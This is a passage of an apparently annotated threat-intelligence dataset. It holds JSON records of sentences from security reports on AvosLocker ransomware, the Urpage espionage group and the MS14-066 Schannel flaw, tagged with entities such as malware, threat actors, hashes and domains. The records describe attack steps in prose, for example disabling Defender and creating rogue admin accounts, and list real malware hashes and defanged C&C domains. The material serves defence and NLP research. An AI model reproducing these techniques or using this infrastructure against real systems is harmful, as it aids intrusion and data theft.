endpoints.","entities":[{"id":5440,"label":"attack-pattern","start_offset":49,"end_offset":87},{"id":46984,"label":"attack-pattern","start_offset":123,"end_offset":139}],"relations":[],"Comments":[]} {"id":1857,"text":" Figure 24. Running more system network configuration discovery scans","entities":[{"id":5442,"label":"attack-pattern","start_offset":29,"end_offset":67}],"relations":[],"Comments":[]} {"id":1858,"text":" Deploying across the network We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.","entities":[{"id":46986,"label":"attack-pattern","start_offset":83,"end_offset":113},{"id":46985,"label":"tools","start_offset":65,"end_offset":68}],"relations":[{"id":283,"from_id":46986,"to_id":46985,"type":"uses"}],"Comments":[]} {"id":1859,"text":" Figure 25. Deploying malicious batch scripts to other endpoints The deployed batch script has the following commands: Disable Windows Update and Microsoft Defender Figure 26. Disable Microsoft defense services Prevents safeboot execution of security products Figure 27. Prevent security products’ execution Create new administrator account Figure 28. Create new account Add the AutoStart mechanism for the AvosLocker executable (update.exe) Figure 29. Add Autostart for ransomware executable Disables legal notice caption Figure 30. Disable legal notice Set safeboot with networking and disables Windows Error Recovery and reboot Figure 31. Setting and disabling network and specific Windows functions Conclusion","entities":[{"id":46990,"label":"malware","start_offset":449,"end_offset":459},{"id":46991,"label":"FILEPATH","start_offset":472,"end_offset":482},{"id":46987,"label":"tools","start_offset":136,"end_offset":150},{"id":46988,"label":"tools","start_offset":155,"end_offset":173}],"relations":[],"Comments":[]} {"id":1860,"text":"While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it.","entities":[{"id":45154,"label":"malware","start_offset":6,"end_offset":16},{"id":45155,"label":"tools","start_offset":54,"end_offset":61},{"id":45156,"label":"attack-pattern","start_offset":66,"end_offset":82}],"relations":[{"id":77,"from_id":45154,"to_id":45155,"type":"uses"},{"id":284,"from_id":45156,"to_id":45155,"type":"uses"},{"id":285,"from_id":45154,"to_id":45156,"type":"uses"}],"Comments":[]} {"id":1861,"text":"We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones.","entities":[],"relations":[],"Comments":[]} {"id":1862,"text":"In addition, aside from its availability, the decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege).","entities":[],"relations":[],"Comments":[]} {"id":1863,"text":"This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.","entities":[],"relations":[],"Comments":[]} {"id":1864,"text":"Other modern ransomware, such as Mespinoza\/Pysa, modify the registries of infected systems during their respective routines to inform their victims that they have been compromised.","entities":[{"id":5472,"label":"threat-actor","start_offset":43,"end_offset":47},{"id":5471,"label":"threat-actor","start_offset":33,"end_offset":42}],"relations":[],"Comments":[]} {"id":1865,"text":"Similar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks.","entities":[{"id":5474,"label":"malware","start_offset":64,"end_offset":74}],"relations":[],"Comments":[]} {"id":1866,"text":"Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors’ presence","entities":[],"relations":[],"Comments":[]} {"id":1867,"text":"grows in sophistication.","entities":[],"relations":[],"Comments":[]} {"id":1868,"text":"In this case, the attackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.","entities":[{"id":46992,"label":"identity","start_offset":55,"end_offset":61}],"relations":[],"Comments":[]} {"id":1869,"text":"However, and specific to this instance, the attempt to kill an antivirus product such as this variant’s TaskKill can also be foiled.","entities":[],"relations":[],"Comments":[]} {"id":1870,"text":"In this example using Trend Micro Vision One, the attempt was unsuccessful likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine.","entities":[{"id":46993,"label":"SOFTWARE","start_offset":22,"end_offset":44}],"relations":[],"Comments":[]} {"id":1871,"text":"The visibility enabled by the platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file being abused to verify its function during compromise.","entities":[],"relations":[],"Comments":[]} {"id":1872,"text":"Avast responded to our notification with this statement: \"We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021.","entities":[{"id":45157,"label":"FILEPATH","start_offset":123,"end_offset":135},{"id":45158,"label":"SOFTWARE","start_offset":159,"end_offset":169},{"id":45159,"label":"TIME","start_offset":182,"end_offset":191},{"id":45160,"label":"identity","start_offset":0,"end_offset":5}],"relations":[{"id":286,"from_id":45158,"to_id":45157,"type":"consists-of"}],"Comments":[]} {"id":1873,"text":"We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can't be loaded to memory.","entities":[{"id":46995,"label":"SOFTWARE","start_offset":71,"end_offset":107},{"id":46994,"label":"identity","start_offset":28,"end_offset":37},{"id":46996,"label":"SOFTWARE","start_offset":135,"end_offset":147}],"relations":[],"Comments":[]} {"id":1874,"text":"The below example shows that the blocking works (output from the \"sc start\" command):","entities":[],"relations":[],"Comments":[]} {"id":1875,"text":" (SC) StartService FAILED 1275: This driver has been blocked from loading","entities":[],"relations":[],"Comments":[]} {"id":1876,"text":"The update from Microsoft for the Windows operating system was published in February as an optional update, and in Microsoft's security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of attack.","entities":[{"id":46997,"label":"SOFTWARE","start_offset":34,"end_offset":58},{"id":46998,"label":"TIME","start_offset":76,"end_offset":84},{"id":47000,"label":"identity","start_offset":115,"end_offset":124},{"id":47001,"label":"TIME","start_offset":147,"end_offset":152},{"id":46999,"label":"identity","start_offset":16,"end_offset":25},{"id":47002,"label":"SOFTWARE","start_offset":188,"end_offset":205}],"relations":[],"Comments":[]} {"id":1877,"text":"All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector.","entities":[{"id":47003,"label":"SOFTWARE","start_offset":48,"end_offset":53},{"id":47004,"label":"SOFTWARE","start_offset":58,"end_offset":61},{"id":47005,"label":"malware","start_offset":84,"end_offset":94}],"relations":[],"Comments":[]} {"id":1878,"text":"For users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their Windows operating system with the latest security updates, and to use a fully updated antivirus program.\"","entities":[{"id":47006,"label":"SOFTWARE","start_offset":126,"end_offset":143}],"relations":[],"Comments":[]} {"id":1879,"text":"Indicators of Compromise (IOCs) File SHA256 Detection Malicious batch file component a5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15","entities":[{"id":5521,"label":"SHA1","start_offset":91,"end_offset":155}],"relations":[],"Comments":[]} {"id":1880,"text":"Trojan","entities":[],"relations":[],"Comments":[]} {"id":1881,"text":"BAT.KILLAV.YACAA","entities":[],"relations":[],"Comments":[]} {"id":1882,"text":"AvosLocker executable 05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5 Ransom.Win32.AVOSLOCKER.SMYXBLNT Mimikatz executable (x32 and x64) 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 HackTool.Win64.MIMIKATZ.ZTJA e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98 HackTool.Win32.Mimikatz.CNFW Log4shell Nmap NSE script ddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96 Backdoor.Win32.CVE202144228.YACAH Impacket tool 14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8 HackTool.Win32.Impacket.AA","entities":[{"id":5525,"label":"tools","start_offset":120,"end_offset":128},{"id":5529,"label":"tools","start_offset":352,"end_offset":356},{"id":5523,"label":"SHA2","start_offset":22,"end_offset":86},{"id":5530,"label":"SHA2","start_offset":368,"end_offset":432},{"id":5522,"label":"malware","start_offset":0,"end_offset":10},{"id":5527,"label":"SHA2","start_offset":154,"end_offset":218},{"id":5528,"label":"SHA2","start_offset":248,"end_offset":312},{"id":5533,"label":"SHA2","start_offset":481,"end_offset":545},{"id":5531,"label":"tools","start_offset":467,"end_offset":475},{"id":47007,"label":"tools","start_offset":546,"end_offset":572},{"id":47009,"label":"tools","start_offset":219,"end_offset":247},{"id":47011,"label":"vulnerability","start_offset":342,"end_offset":351},{"id":47012,"label":"malware","start_offset":87,"end_offset":119},{"id":47008,"label":"tools","start_offset":313,"end_offset":341},{"id":47010,"label":"tools","start_offset":433,"end_offset":466}],"relations":[{"id":288,"from_id":47012,"to_id":5522,"type":"duplicate-of"},{"id":287,"from_id":5522,"to_id":5523,"type":"consists-of"}],"Comments":[]} {"id":1883,"text":" Tags Malware | Exploits & Vulnerabilities | Cyber Threats | APT & Targeted Attacks | Compliance & Risks | Endpoints | Ransomware | Network | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":1884,"text":"In the process of monitoring changes in the threat landscape, we get a clearer insight into the way threat actors work behind the schemes.","entities":[],"relations":[],"Comments":[]} {"id":1885,"text":"In this case we dig deeper into the possible connection between cyberattacks by focusing on the similarities an unnamed threat actor shares with Confucius, Patchwork, and another threat actor called Bahamut.","entities":[{"id":47014,"label":"threat-actor","start_offset":156,"end_offset":165},{"id":47013,"label":"threat-actor","start_offset":145,"end_offset":154},{"id":47015,"label":"threat-actor","start_offset":199,"end_offset":206}],"relations":[],"Comments":[]} {"id":1886,"text":"For the sake of this report, we will call this unnamed threat actor “Urpage.”","entities":[{"id":47016,"label":"threat-actor","start_offset":69,"end_offset":75}],"relations":[],"Comments":[]} {"id":1887,"text":"What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages.","entities":[{"id":45163,"label":"SOFTWARE","start_offset":51,"end_offset":57},{"id":45162,"label":"threat-actor","start_offset":10,"end_offset":16}],"relations":[{"id":78,"from_id":45162,"to_id":45163,"type":"targets"}],"Comments":[]} {"id":1888,"text":"However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware, is what makes it more intriguing as it connects Urpage to these other known threats.","entities":[{"id":47017,"label":"threat-actor","start_offset":68,"end_offset":77},{"id":47019,"label":"threat-actor","start_offset":82,"end_offset":91},{"id":47020,"label":"threat-actor","start_offset":117,"end_offset":124},{"id":47021,"label":"threat-actor","start_offset":187,"end_offset":193}],"relations":[],"Comments":[]} {"id":1889,"text":"In our previous entry, we already covered the Delphi component in the context of the Confucius and Patchwork connection.","entities":[{"id":47022,"label":"threat-actor","start_offset":85,"end_offset":94},{"id":47023,"label":"threat-actor","start_offset":99,"end_offset":108}],"relations":[],"Comments":[]} {"id":1890,"text":"We mentioned Urpage as a third unnamed threat actor connected to the two.","entities":[{"id":45164,"label":"threat-actor","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} {"id":1891,"text":"This time, we look into Urpage to gain a deeper insight into the way several threat actors' actions intersect.","entities":[{"id":47024,"label":"threat-actor","start_offset":24,"end_offset":30}],"relations":[],"Comments":[]} {"id":1892,"text":"The Bahamut Link Fake websites","entities":[{"id":5568,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":1893,"text":"The link between Bahamut and Urpage can be best discussed by way of the multiple malicious Android samples that matched Bahamut's code and had C&C belonging to the Urpage infrastructure.","entities":[{"id":45170,"label":"Infrastucture","start_offset":143,"end_offset":146},{"id":45167,"label":"threat-actor","start_offset":120,"end_offset":128},{"id":5570,"label":"threat-actor","start_offset":17,"end_offset":24},{"id":5572,"label":"threat-actor","start_offset":29,"end_offset":35},{"id":5578,"label":"threat-actor","start_offset":164,"end_offset":170},{"id":47025,"label":"SOFTWARE","start_offset":91,"end_offset":106}],"relations":[{"id":289,"from_id":5570,"to_id":5572,"type":"related-to"}],"Comments":[]} {"id":1894,"text":"Some of these C&C websites also act as phishing sites that lure users into downloading these very applications.","entities":[{"id":47026,"label":"attack-pattern","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} {"id":1895,"text":"The threat actor sets up these fake websites describing the application and linking to the Google Play Store to download it, like in the case of the malicious website, pikrpro[.]eu, seen below Another sample website involved the use of a closely copied version of an existing website, with slight changes in the logo and options above the page.","entities":[{"id":47027,"label":"SOFTWARE","start_offset":91,"end_offset":108},{"id":47028,"label":"DOMAIN","start_offset":168,"end_offset":180}],"relations":[],"Comments":[]} {"id":1896,"text":"The download links were also replaced to download the malicious Android application instead.","entities":[{"id":45171,"label":"SOFTWARE","start_offset":64,"end_offset":71}],"relations":[],"Comments":[]} {"id":1897,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":1898,"text":"Original (top) and modified (bottom) website","entities":[],"relations":[],"Comments":[]} {"id":1899,"text":"Upon writing this entry, we’ve coordinated with Google to ensure that the malicious applications these C&C sites advertise are no longer available for download on the Google Play Store.","entities":[{"id":45172,"label":"identity","start_offset":48,"end_offset":54},{"id":45173,"label":"SOFTWARE","start_offset":167,"end_offset":184}],"relations":[],"Comments":[]} {"id":1900,"text":"It is important to note however, that not all C&C websites for Urpage advertise malicious applications.","entities":[{"id":5595,"label":"threat-actor","start_offset":63,"end_offset":69}],"relations":[],"Comments":[]} {"id":1901,"text":" Some simply contain a random template with empty categories, likely as a ploy to hide its malicious activities.","entities":[],"relations":[],"Comments":[]} {"id":1902,"text":"Android targeting","entities":[{"id":45174,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":1903,"text":"As with Bahamut applications, once downloaded and executed, it showed multiple malicious features that deal with stealing information.","entities":[{"id":47030,"label":"attack-pattern","start_offset":113,"end_offset":133},{"id":47029,"label":"threat-actor","start_offset":8,"end_offset":15}],"relations":[{"id":290,"from_id":47029,"to_id":47030,"type":"uses"}],"Comments":[]} {"id":1904,"text":"Some of these features are listed below.","entities":[],"relations":[],"Comments":[]} {"id":1905,"text":" Retrieves basic information like network information and MAC address from an infected phone SMS stealing Contacts stealing Audio recording GPS location retrieval Steals files with the specific extensions, although not all samples target these extensions.","entities":[],"relations":[],"Comments":[]} {"id":1906,"text":" File type File extensions Document files .txt, .csv, .doc, .docx, .xls, .xlsx, .pdf WhatsApp databases .db.crypt5 to .db.crypt12 Geolocation related files .kml, .kmz, .gmx, .aqm Audio files .mp3, .opus Videos .mp4, .amr, .wmv, .3gp, Pictures .jpeg, .jpg ","entities":[{"id":47031,"label":"SOFTWARE","start_offset":86,"end_offset":94}],"relations":[],"Comments":[]} {"id":1907,"text":"Of note is one specific application that had a different purpose from the others.","entities":[],"relations":[],"Comments":[]} {"id":1908,"text":"This application has the same encryption routine as other Urpage applications.","entities":[{"id":45175,"label":"threat-actor","start_offset":58,"end_offset":64}],"relations":[],"Comments":[]} {"id":1909,"text":"Instead of stealing documents or images, it works on top of a modified version of the legitimate Threema, an end-to-end encrypted messaging application, to steal screenshots of messages.","entities":[{"id":47032,"label":"SOFTWARE","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} {"id":1910,"text":"This application has the same icon and label as the legitimate Threema.","entities":[{"id":47033,"label":"SOFTWARE","start_offset":63,"end_offset":70}],"relations":[],"Comments":[]} {"id":1911,"text":"Once launched, it drops a modified APK version of Threema and prompts the user to install the application.","entities":[{"id":45176,"label":"SOFTWARE","start_offset":50,"end_offset":57}],"relations":[],"Comments":[]} {"id":1912,"text":"The malicious application then hides its icon on the device but still runs in the background, while the modified Threema works like normal.","entities":[{"id":47034,"label":"SOFTWARE","start_offset":113,"end_offset":120}],"relations":[],"Comments":[]} {"id":1913,"text":"Unknown to the user, the code in the modified Threema allows it to take screenshots of itself every 10 seconds.","entities":[{"id":5617,"label":"TIME","start_offset":94,"end_offset":110},{"id":47035,"label":"SOFTWARE","start_offset":46,"end_offset":53}],"relations":[],"Comments":[]} {"id":1914,"text":"These images are stored in the location\/sdcard\/Android\/data\/ch.threema.app\/DataData directory, while the “dropper” or the malicious application working in the background uploads the images to the C&C for the threat actor to access.","entities":[{"id":45177,"label":"FILEPATH","start_offset":39,"end_offset":83},{"id":45178,"label":"Infrastucture","start_offset":196,"end_offset":199}],"relations":[],"Comments":[]} {"id":1915,"text":"Figure 2. Comparison of legitimate Threema code (left) to the modified version (right) with the inserted code","entities":[{"id":47036,"label":"SOFTWARE","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} {"id":1916,"text":"Other activities","entities":[],"relations":[],"Comments":[]} {"id":1917,"text":"Aside from acting as a C&C and distributing Bahamut-like malware, some of these websites also serve as the host for other malicious documents.","entities":[{"id":45179,"label":"threat-actor","start_offset":44,"end_offset":51}],"relations":[],"Comments":[]} {"id":1918,"text":"These other activities further establish the link of Urpage — and consequently Bahamut — to other threat actors.","entities":[{"id":5624,"label":"threat-actor","start_offset":53,"end_offset":59},{"id":47037,"label":"threat-actor","start_offset":79,"end_offset":86}],"relations":[],"Comments":[]} {"id":1919,"text":"Take, for example, the previously mentioned pikrpro[.]eu.","entities":[{"id":47038,"label":"DOMAIN","start_offset":44,"end_offset":56}],"relations":[],"Comments":[]} {"id":1920,"text":"This C&C website also acts as host not only for the malicious Android application but also for two other malicious documents listed here.","entities":[{"id":45180,"label":"SOFTWARE","start_offset":62,"end_offset":69}],"relations":[],"Comments":[]} {"id":1921,"text":" A malicious RTF file that exploits the CVE-2017-8750 and drops a malicious VB backdoor with C&C appswonder[.]info A malicious InPage file that exploits CVE-2017-12824 and drops two files, one non-malicious, and one malicious VB backdoor with C&C referfile[.]com Talos recently reported both C&C domain names with one type of campaign that targets iOS and involves MDM, and another type using VB and Delphi backdoors.","entities":[{"id":47039,"label":"vulnerability","start_offset":40,"end_offset":53},{"id":47042,"label":"DOMAIN","start_offset":247,"end_offset":262},{"id":47043,"label":"identity","start_offset":264,"end_offset":269},{"id":47044,"label":"SOFTWARE","start_offset":349,"end_offset":352},{"id":47045,"label":"malware","start_offset":3,"end_offset":16},{"id":47040,"label":"vulnerability","start_offset":153,"end_offset":167},{"id":47041,"label":"DOMAIN","start_offset":97,"end_offset":114}],"relations":[{"id":291,"from_id":47045,"to_id":47039,"type":"exploits"},{"id":292,"from_id":47045,"to_id":47041,"type":"communicates-with"}],"Comments":[]} {"id":1922,"text":"This leads us back to the Confucius and Patchwork link.","entities":[{"id":5646,"label":"threat-actor","start_offset":40,"end_offset":49},{"id":47046,"label":"threat-actor","start_offset":26,"end_offset":35}],"relations":[],"Comments":[]} {"id":1923,"text":"The Confucius Link","entities":[{"id":47047,"label":"threat-actor","start_offset":4,"end_offset":13}],"relations":[],"Comments":[]} {"id":1924,"text":"In our previous entry, we already discussed how Confucius used the same Delphi file stealer as Urpage.","entities":[{"id":47048,"label":"threat-actor","start_offset":48,"end_offset":57},{"id":47049,"label":"threat-actor","start_offset":95,"end_offset":101}],"relations":[],"Comments":[]} {"id":1925,"text":"Digging into Urpage, we found another link—two malicious RTF files that exploit different vulnerabilities but download a similar script (detected as TROJ_POWLOAD.GAA) containing two base64-encoded URLs.","entities":[{"id":47050,"label":"threat-actor","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} {"id":1926,"text":"One of the URLs is for the decoy document, while the other one is for the payload.","entities":[],"relations":[],"Comments":[]} {"id":1927,"text":"One of the RTF files was found in a server related to Confucius (f1a54dca2fdfe59ec3f537148460364fb5d046c9b4e7db5fc819a9732ae0e063, detected as TROJ_CVE201711882.AG), while the other one (434d34c0502910c562f5c6840694737a2c82a8c44004fa58c7c457b08aac17bd,detected as Mal_CVE20170199-2) downloaded a VB Backdoor that pings back to twitck[.]com, a domain name belonging to Urpage.","entities":[{"id":5662,"label":"SHA2","start_offset":187,"end_offset":251},{"id":5659,"label":"threat-actor","start_offset":54,"end_offset":63},{"id":5660,"label":"SHA2","start_offset":65,"end_offset":129},{"id":47051,"label":"malware","start_offset":143,"end_offset":163},{"id":47052,"label":"malware","start_offset":264,"end_offset":281},{"id":47053,"label":"DOMAIN","start_offset":327,"end_offset":339},{"id":47054,"label":"threat-actor","start_offset":368,"end_offset":374}],"relations":[{"id":293,"from_id":5660,"to_id":5659,"type":"authored-by"},{"id":294,"from_id":47051,"to_id":5660,"type":"related-to"},{"id":295,"from_id":47051,"to_id":5659,"type":"authored-by"},{"id":296,"from_id":5662,"to_id":5659,"type":"authored-by"},{"id":297,"from_id":47052,"to_id":5659,"type":"authored-by"},{"id":298,"from_id":47052,"to_id":47053,"type":"beacons-to"},{"id":299,"from_id":47054,"to_id":47053,"type":"controls"}],"Comments":[]} {"id":1928,"text":"The Patchwork Link Patchwork also uses the Delphi file stealer as a similarity with Urpage, which suggests the three groups are somehow related.","entities":[{"id":5664,"label":"threat-actor","start_offset":4,"end_offset":13},{"id":5665,"label":"threat-actor","start_offset":19,"end_offset":28},{"id":47055,"label":"threat-actor","start_offset":84,"end_offset":90}],"relations":[],"Comments":[]} {"id":1929,"text":"But this link is further fortified by the Android applications we found whose code is like that of Bahamut, with the C&C matching the usual name registration pattern of Patchwork’s group, as well as an infrastructure close to an old Patchwork domain.","entities":[{"id":45181,"label":"SOFTWARE","start_offset":42,"end_offset":49},{"id":45183,"label":"threat-actor","start_offset":169,"end_offset":178},{"id":45184,"label":"threat-actor","start_offset":233,"end_offset":242},{"id":45182,"label":"malware","start_offset":99,"end_offset":106}],"relations":[{"id":80,"from_id":45182,"to_id":45183,"type":"attributed-to"}],"Comments":[]} {"id":1931,"text":"Patchwork has also recently employed Android malware in its attacks, with its use of a customized version of AndroRAT.","entities":[{"id":47056,"label":"malware","start_offset":109,"end_offset":117},{"id":47058,"label":"SOFTWARE","start_offset":37,"end_offset":44},{"id":47057,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":1932,"text":"Summary","entities":[],"relations":[],"Comments":[]} {"id":1933,"text":"The many similarities and connections show that threat actors do not work in isolation, and that attacks do not necessarily appear from out of nowhere.","entities":[],"relations":[],"Comments":[]} {"id":1934,"text":"This may even suggest that a single development team may be behind this attack — maybe a single paid group that has sold its tools and services to other groups with different goals and targets.","entities":[],"relations":[],"Comments":[]} {"id":1935,"text":"We’ve summarized all the mentioned findings in the table below.","entities":[],"relations":[],"Comments":[]} {"id":1936,"text":" Urpage Bahamut Confucius Patchwork \"BioData\" Delphi backdoor and file stealer X X X VB backdoor X Android \"Bahamut-like\" malware X X X Custom Android malware X AndroRAT Android malware X InPage malicious documents X X simply obfuscated HTA downloaders X X IOS malware X Confucius malware X remote-access-c3 backdoor X Sneepy\/Byebye shell malware X Python cloud filestealers X AllaKore RAT X Badnews malware X QuasarRAT X NDiskMonitor malware X Targets","entities":[{"id":5685,"label":"threat-actor","start_offset":3,"end_offset":9},{"id":5686,"label":"threat-actor","start_offset":10,"end_offset":17},{"id":5687,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":5688,"label":"threat-actor","start_offset":28,"end_offset":37},{"id":5689,"label":"malware","start_offset":39,"end_offset":46},{"id":5693,"label":"malware","start_offset":118,"end_offset":125},{"id":5694,"label":"malware","start_offset":179,"end_offset":187},{"id":5695,"label":"threat-actor","start_offset":309,"end_offset":318},{"id":5697,"label":"malware","start_offset":369,"end_offset":375},{"id":5700,"label":"malware","start_offset":439,"end_offset":451},{"id":5701,"label":"malware","start_offset":460,"end_offset":467},{"id":5702,"label":"malware","start_offset":484,"end_offset":493},{"id":5703,"label":"malware","start_offset":502,"end_offset":514},{"id":47059,"label":"SOFTWARE","start_offset":155,"end_offset":162},{"id":47060,"label":"malware","start_offset":376,"end_offset":382}],"relations":[],"Comments":[]} {"id":1937,"text":"We did not find Urpage victims in our telemetry, likely because of the targeted nature of these attacks.","entities":[{"id":5704,"label":"threat-actor","start_offset":16,"end_offset":22}],"relations":[],"Comments":[]} {"id":1938,"text":"However, the domains used by Urpage provided hints about its target.","entities":[{"id":45185,"label":"threat-actor","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} {"id":1939,"text":"For one, there is the domain pikrpro[.]eu and its subdomains—the islamicfinderfeedback[.]pikrpro[.]eu and the memrifilesforinfo[.]pikpro[.]eu.","entities":[{"id":47063,"label":"DOMAIN","start_offset":110,"end_offset":141},{"id":47061,"label":"DOMAIN","start_offset":29,"end_offset":41},{"id":47062,"label":"DOMAIN","start_offset":65,"end_offset":101}],"relations":[],"Comments":[]} {"id":1941,"text":"Additionally, many of the files related to the Urpage domains are auto-extractable files that drop Delphi or VB backdoor and open a decoy document.","entities":[{"id":47065,"label":"threat-actor","start_offset":47,"end_offset":53}],"relations":[],"Comments":[]} {"id":1942,"text":"The decoy documents tell more about Urpage's possible targets, as it contains text from articles about the region of Kashmir.","entities":[{"id":47066,"label":"threat-actor","start_offset":36,"end_offset":42},{"id":47067,"label":"location","start_offset":117,"end_offset":124}],"relations":[{"id":300,"from_id":47066,"to_id":47067,"type":"targets"}],"Comments":[]} {"id":1943,"text":"The header for a sample document can be seen below.","entities":[],"relations":[],"Comments":[]} {"id":1944,"text":" The documents can also be image files with the same theme, as can be seen here. Multiple Android applications further drive this notion, as they provide services based on the interests of users in that region.","entities":[],"relations":[],"Comments":[]} {"id":1945,"text":"They have a malicious application that provides services for religion, as well as popular sports in the region.","entities":[],"relations":[],"Comments":[]} {"id":1946,"text":" Figure 3. Malicious application for observing Ramadan Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":1947,"text":"Malicious application for cricket news Solutions and Mitigation Taking note of these similarities and connections can help organizations and users in their continued defense against Urpage, Bahamut, Confucius, and Patchwork.","entities":[{"id":47070,"label":"threat-actor","start_offset":199,"end_offset":208},{"id":47071,"label":"threat-actor","start_offset":214,"end_offset":223},{"id":47068,"label":"threat-actor","start_offset":182,"end_offset":188},{"id":47069,"label":"threat-actor","start_offset":190,"end_offset":197}],"relations":[],"Comments":[]} {"id":1948,"text":"The connection of Urpage to the other three threat actors demonstrate that cyberattacks don’t exist in silos and that it hints at a circulation of knowledge and technologies that help in the continuing evolution of different malicious campaigns.","entities":[{"id":47072,"label":"threat-actor","start_offset":18,"end_offset":24}],"relations":[],"Comments":[]} {"id":1949,"text":"Given this knowledge, organizations must be more vigilant in monitoring threats, as changes in one may mean that changes in others could follow.","entities":[],"relations":[],"Comments":[]} {"id":1950,"text":"Organizations can develop defenses against the social engineering component these four threat actors have in common.","entities":[],"relations":[],"Comments":[]} {"id":1951,"text":"Users should be able to identify the indicators of a social engineering campaign.","entities":[],"relations":[],"Comments":[]} {"id":1952,"text":"Paying close attention to the domain name of a website before performing any further action can also help mitigate threats, including threats like Urpage that have targeted victims.","entities":[{"id":47073,"label":"threat-actor","start_offset":147,"end_offset":153}],"relations":[],"Comments":[]} {"id":1953,"text":"As an additional defense against the growing use of malicious mobile applications, enterprises and end users can benefit from multilayered mobile security solutions such as Trend Micro™ Mobile Security for Android™ which is also available on Google Play.","entities":[{"id":45192,"label":"SOFTWARE","start_offset":242,"end_offset":253},{"id":45193,"label":"SOFTWARE","start_offset":173,"end_offset":214}],"relations":[],"Comments":[]} {"id":1954,"text":"Trend Micro’s Mobile App Reputation Service (MARS) covers Android and iOS threats using leading sandbox and machine learning technologies.","entities":[{"id":47075,"label":"SOFTWARE","start_offset":58,"end_offset":65},{"id":47074,"label":"SOFTWARE","start_offset":0,"end_offset":50},{"id":47076,"label":"SOFTWARE","start_offset":70,"end_offset":74}],"relations":[],"Comments":[]} {"id":1955,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[{"id":47077,"label":"attack-pattern","start_offset":38,"end_offset":46},{"id":47079,"label":"attack-pattern","start_offset":86,"end_offset":111},{"id":47080,"label":"attack-pattern","start_offset":29,"end_offset":36},{"id":47081,"label":"attack-pattern","start_offset":67,"end_offset":80},{"id":47078,"label":"attack-pattern","start_offset":51,"end_offset":65}],"relations":[],"Comments":[]} {"id":1956,"text":"For organizations, Trend Micro™ Mobile Security for Enterprise provides device, compliance and application management, data protection, and configuration provisioning.","entities":[{"id":45194,"label":"SOFTWARE","start_offset":19,"end_offset":62}],"relations":[],"Comments":[]} {"id":1957,"text":"It also protects devices from attacks that leverage vulnerabilities, preventing unauthorized access to apps, as well as detecting and blocking malware and fraudulent websites.","entities":[],"relations":[],"Comments":[]} {"id":1958,"text":"The Trend Micro™ Deep Discovery™ threat protection platform enables organizations to detect, analyze, and respond to modern threats such as sophisticated malware, targeted attacks, and APTs.","entities":[{"id":47082,"label":"SOFTWARE","start_offset":4,"end_offset":32}],"relations":[],"Comments":[]} {"id":1959,"text":"Trend Micro™ Smart Protection for Endpoints with Maximum XGen™ security infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across user activity and any endpoint, offering the broadest possible protection against advanced attacks.","entities":[{"id":47083,"label":"SOFTWARE","start_offset":0,"end_offset":62}],"relations":[],"Comments":[]} {"id":1960,"text":"This appendix contains the latest Indicators of Compromise (IOCs) related to the different groups. Tags Mobile | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} {"id":1961,"text":"Microsoft recently released a patch for a critical vulnerability in Microsoft Secure Channel (aka Schannel).","entities":[{"id":47084,"label":"identity","start_offset":0,"end_offset":9},{"id":47085,"label":"SOFTWARE","start_offset":68,"end_offset":107}],"relations":[],"Comments":[]} {"id":1962,"text":" This vulnerability is being referred to as MS14-066.","entities":[{"id":45196,"label":"vulnerability","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} {"id":1963,"text":" The patch addressing CVE-2014-6321 fixed many areas within schannel.dll, including at least two vulnerabilities related to the handling of the Datagram Transport Layer Security (DTLS) protocol.","entities":[{"id":47086,"label":"vulnerability","start_offset":22,"end_offset":35},{"id":47087,"label":"FILEPATH","start_offset":60,"end_offset":72}],"relations":[],"Comments":[]} {"id":1964,"text":" DTLS is used by Microsoft Remote Desktop Protocol (RDP) to provide communications privacy for datagram protocols.","entities":[{"id":47088,"label":"SOFTWARE","start_offset":17,"end_offset":56}],"relations":[],"Comments":[]} {"id":1965,"text":"The DTLS protocol is used by Microsoft Windows Remote Desktop Gateway (RDG) to establish a secure channel between the RDG client and RDG server (described in detail 